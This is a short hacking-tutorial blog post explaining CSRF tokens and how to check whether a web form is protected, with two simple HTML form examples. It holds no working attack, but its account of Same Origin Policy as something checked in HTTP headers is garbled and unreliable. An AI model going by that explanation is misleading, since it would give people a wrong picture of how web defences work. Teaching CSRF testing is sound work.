Hacking Tutorials

Cross Site Request Forgery (CSRF) Explained – 2

Hello guys! In previous article we learned what is Cross Site Request Forgery (CSRF) and how it works. This time we are going to learn how to test for CSRF vulnerabilities.

So lets keep it simple

Every input form is vulnerable to CSRF unless some security measures are being used.

Yeah you read it right, every input form is vulnerable to CSRF unless some security measures are being used.
But what kind of security measures?
Well the most common method to defend against CSRF is to use a CSRF Token.

What is a CSRF Token and How it works?

Here’s a simple input form which submits a value “amount” to the page money.php:

<form action="http://example.com/money.php" method="POST">  
  <input type="text" name="amount">
  <input type="submit">

This form is potentially vulnerable to CSRF.
Now lets add a hidden input form which automatically submits a long and random string called a CSRF Token.

<form action="http://example.com/money.php" method="POST">  
  <input type="hidden" name="_token" value="mc78P887bcPncYhoAdloizdc9njblCb">
  <input type="text" name="amount">
  <input type="submit">

CSRF Token changes everytime you visit the webpage so its impossible for the attacker to guess what would be the CSRF Token for a new request from the victim.
A CSRF Token can also be implement in cookies but most of the times you will find it.
But if the attacker finds an XSS vulnerability in the website then its a piece of cake to bypass the CSRF Token thing. That’s why there’s another security practice that used by wise people, Same Origin Policy (SOP).

Same Origin Policy

To understand what is SOP, try asking your telecom service provider to lock your SIM card. They will ask you to confirm you are the same person who owns the SIM card to make sure that someone else is not trying to lock it.
Same Origin Policy does the same thing, it doesn’t let any other website use scripts hosted on your website. Always keep in mind that SOP only works when a client sided programming like JavaScript or AJAX is being used, it doesn’t work with HTML forms.
If you want to check if a website uses SOP or not, just check the HTTP headers.

Thats all. Next time when you want to check if a input form is vulnerable to CSRF, just check webpage’s source code to see if there is some token mechanism and also take a look at HTTP headers to see if SOP is in use.
Keep Learning! Keep Hacking!

Also Read: WAF, IPS and IDS : Working Explained

About the author


I am Somdev Sangwan also known as D3V. I am n00b and I love computers and hacking. I am a python freak and your friendly neighborhood hacker.

Add Comment

Click here to post a comment

Subscribe Now

Subscribe for free and get latest articles delivered right into your inbox.

Thank you for subscribing.

Something went wrong.